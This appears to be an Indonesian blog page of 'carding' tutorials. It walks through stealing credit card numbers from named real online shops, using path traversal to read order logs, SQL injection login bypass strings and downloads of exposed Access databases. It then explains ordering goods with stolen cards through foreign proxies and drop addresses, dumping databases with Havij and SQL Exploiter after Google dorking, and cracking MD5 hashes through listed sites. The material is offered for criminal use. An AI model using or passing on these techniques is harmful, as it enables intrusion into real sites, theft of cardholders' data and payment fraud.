Tampilkan postingan dengan label HEACKING TUTORIAL. Tampilkan semua postingan
Tampilkan postingan dengan label HEACKING TUTORIAL. Tampilkan semua postingan

TUTORIAL CARDING NEWBIE



OKE LAH TEMAN2 YANG BERKECIMPUNG KALI INI SAYA HANYA MEMBAGI BAGAIMAN DASAR2 UNTUK MELAKUKAN CARDING IHIHIH...JANGAN DI GUNAKAN UNTUK KEJAHATAN TAPI GUNAKAN UNTUK KEKAYAAN OHOHO

CGI Store Log
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.cashwells.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm
2. Kemudian hapus/delete Repair_Manuals.htm di url/browsing sehingga menjadi http://www.cashwells.com/cgi-bin/store/index.cgi?page=
3. Masukkan file ini di belakang situs tadi :
../admin/files/order.log
Misal nya http://www.cashwells.com/cgi-bin/store/index.cgi?page=../admin/files/order.log
4. Maka yang keluar di situs itu adalah nomor CC (credit card).
Admin Take Over
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.partsupply.in.th/shopadmin.asp
2. Langkah selanjutnya gunakan teknik SQL Injection
user : ‘or”=’
pass : ‘or”=’
3. Trus kamu buka file2 yang ada disana satu persatu. Dapat deh……. CC yg kita inginkan. Kalo kamu mendapatkan nomor CC (credit card) artinya kamu bernasib baik. Tapi kalo belum ada nomor CC (credit card) disana, artinya kamu belum beruntung. Coba cari lagi target lain.
Database Downloadable
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.youngsliquors.com/winestore/shopadmin.asp
2. Kemudian hapus/delete shopadmin.asp di url/browsing sehingga menjadi http://www.youngsliquors.com/winestore/
3. Masukkan file ini di belakang situs tadi :
shopdbtest.asp
Misal nya http://www.youngsliquors.com/winestore/shopdbtest.asp
4. Trus lihat apa nama databasenya dan letaknya pada : xDatabase dan xDblocation
contoh :
xDatabase : shopping300
xDatabase :../../../../www/youngsliquors/5498761211
5. Skrg utk mendownload file shopping300 dapat dilakukan dgn merubah url/browsing nya menjadi :
http://www.youngsliquors.com/winestore/shopping300.mdb
6. Kalo sudah di download, buka file shopping300.mdb dgn Microsoft Access.
Metacart
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.imagexpres.com/metacart/moreinfo.asp
2. Kemudian hapus/delete moreinfo.asp di url/browsing sehingga menjadi http://www.imagexpres.com/metacart/
3. Masukkan file ini di belakang situs tadi :
database/metacart.mdb
Misal nya http://www.imagexpres.com/metacart/database/metacart.mdb
6. Kalo sudah di download, buka file metacart.mdb dgn Microsoft Access.
PDshopPro Shopping Cart
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.marktwainbooks.com/shop/category.asp?catid=4
2. Kemudian hapus/delete shop/category.asp?catid=4 di url/browsing sehingga menjadi http://www.marktwainbooks.com
3. Masukkan file ini di belakang situs tadi :
admin/dbsetup.asp
Misal nya http://www.marktwainbooks.com/admin/dbsetup.asp
4. Maka yang keluar di situs target adalah :
Your Database Type :
Microsoft Access
Your Connection String :
Driver={Microsoft Access Driver (*.mdb)}; DBQ=d:\inetpub\marktwainbooks\data\pdshoppro.mdb;
Current Status :
Connection to Database OK.
Database Primary ‘setup’ Table Found!
Database permissions OK!
5. Skrg utk mendownload file pdshoppro.mdb dapat dilakukan dgn merubah url/browsing nya menjadi :
http://www.marktwainbooks.com/data/pdshoppro.mdb
6. Kalo sudah di download, buka file pdshoppro.mdb dgn Microsoft Access.
Cara Order Barang
Sebelum melakukan order barang, kamu musti
mempunyai seorang teman di luar negeri (misalnya USA) karna kita akan menggunakan alamat teman kita.
Jgn harap bisa order ke Indonesia karna Indonesia termasuk dalam daftar “Black List Order”.
Apabila kamu order barang menggunakan CC (Credit Card) org/pemiliknya asal USA maka sebelum order barang, gunakan proxy USA.
Begitu pula sebaliknya jika CC org/pemiliknya asal Inggris maka gunakan proxy UK.

1. Order sebuah Laptop di sebuah situs, misal nya seperti di bawah ini. Lalu klik tab “Add to Cart”



2. Kemudian masukkan nomor CDW (liat kolom CDW) ke kolom “QuickCart”. Lalu klik tab “Continue to Checkout”



3. Karna kamu Costumer baru, klik tab “Create Account”



4. Isilah data-data teman kamu (data di bawah ini adalah palsu).



5. Isi lagi data-data teman kamu (data di bawah ini adalah palsu).



6. Pilih salah satu “Shipping Method” nya.



7. Masukkan data CC (Credit Card) yg kamu dapati dari situs atau teman.



8. Perhatikan “Shipping Adress” nya. Laptop yg kita beli akan di kirim ke alamat teman kita (data di bawah ini adalah palsu).

9. Perhatikan lagi “Shipping Adress” nya (data di bawah ini adalah palsu).



10. Skrg kamu tinggal menunggu kabar dari teman kamu yg di luar negeri (USA) via email/telepon.
Contoh hasil hasil Tracking Order:
Thank you for your order.
(Order Number: 20081221000XX) Payment is now complete.
Order Number: 20081221000XX
Total Price: $1153.00
Products will be sent as soon as dispatch preparations are complete.
We look forward to serving you again.
====================================
Ini hanya sebuah informasi yang perlu anda ketahui!
Source from: jambihackerlink[dot]googlepages[dot]com
===================================
READMORE
 

TUTORIAL CARDING DENGAN HAVIJ







sekarang dunia telah maju pesat dalam teknologi , bahkan dala hacking pun sekarang dipermudah berkat adanya software atau tools yang memudahkan kita mengerjakan sesuatu yang kita mau


Langsung saja kita sharing bagaimana cara menggunakan Havij DOWNLOAD

ertama cari dulu dork nya karena kita menggunakan teknik SQL Injection Vulnerability
dork nya bisa anda cari di google dengan keyword DORK SQL , Contoh : " inurl:view_product.php?id= " (tanpa kutip)

Kedua taruh dork tersebut di google search engine lalu cari , maka akan muncul banyak sekali site yang bisa kita inject





Lalu buka satu persatu dan sisipkan tanda ' di akhir URL sampai menemukan syntax eror




Setelah mendapatkan site yang akan menjadi target langsung hajar saja menggunakan havij
Paste url site tersebut ke kolom target di HAVIJ dan tekan Analyze



setelah dapat klik get table dan setelah itu get columns and then get data finish
SELAMAT anda telah berhasil mendapatkan database website tersebut seperti email dan password member bahkan admin dari website tersebut



Setelah itu lihat data found fassword =505be7e39328a96ocfe6 bla..bla..bla.
itu merupakan hash md5 yang belum di crack
untuk menjadi sebuah fassword anda terlebih dahulu mengcrak fassowrd di web ini


md5pass.info
hashcrack.com
generuj.pl
authsecu.com
md5decryption.com
md5.rednoize.com
md5decrypter.com
md5crack.com
gdataonline.com
passcracking.com
cmd5.com
schwett.com/md5
milw0rm.com/md5
md5this.com
tmto.org
hashchecker.com
kerinci.net
hash.db.hk
crackfor.me
md5-db.de
md5hood.com
neofusion.de
xmd5.cn
md5.shalla.de
md5.my-addr.com
hashcracking.info <– API: https://hashcracking.info/check.php?hash {hash}
md5.opencracking.info
md5online.net
macrosoftware.ro/md5
netmd5crack.com
bokehman.com
md5-decrypter.com
hash-database.net
thoran.eu
md5-database.net
web-security-services.com
bitdelivery.net
READMORE
 

CARDING ALA NEWBIE





Kali ini saya akan membagi cara carding ala nAewbitol sperti saya ini..yang masih menggunakan sofware ihihih maklum newbie ....

PERINGATAN JANGAN DI GUNAKAN DI WEBSITE INDONESIA TANAH AIR KITA



DOWNLOAD DLU URL EXTRAKTOR


DOWNLOAD JUGA SQL EXPLOITER

DOWNLAOD VIDOENYA

Thap -tahap yang di lakukan begini ceritanya :
#buka google extraktor tadi .lalu masukan dork : product.asp?id= site:il
#kamu scan , kalau sudah muncul link-link yang keluar silahkan klik kanan kamu terus
REMOVE DUPLICATE, oke bro
#lalu pindah ke tab sql Injector Query Builder
#masukan argumen dengan tanda tanya(?) di insert argument here
#nah kalau sudah mas bro klik dech BUILD dan scan
#trus Ke tab berikutnya yaitu tab ATTACK VICTIM
#cari yang eror result nya :UNCLOSED qoutation mark before the character
#pokoknya harus gitu lah mas bro
#klik kanan mas bro lalu copy url victim

TAHAP PEMAKAIAN SQL EXPLOITER :
#buka sql exploiter terus ke tab ATTACKER for the HAckable SIte !!!
#klik Add Manualy, masukan url victim yang tadi mas bro ,trus paste (kadang tanda '(petik) dihilangkan
#kalau udah mas bro klik SIte info sampai info nya keluar
#kalau udah keluar maka tinggal GEt Tables .maka muncul table" web

#pilih salah 1 yang ada di table tsb yang kira" dimana letak CC,trus Get Columns
buat mengetahui columns apa di table itu,kalau bisa ke table order
#kalau udah muncul semua columns ,drag semua terus get data



SORY GK DI KASI GAMBAR-GAMBAR..LAGI MALAS ANE ..LAGI SEDIH
READMORE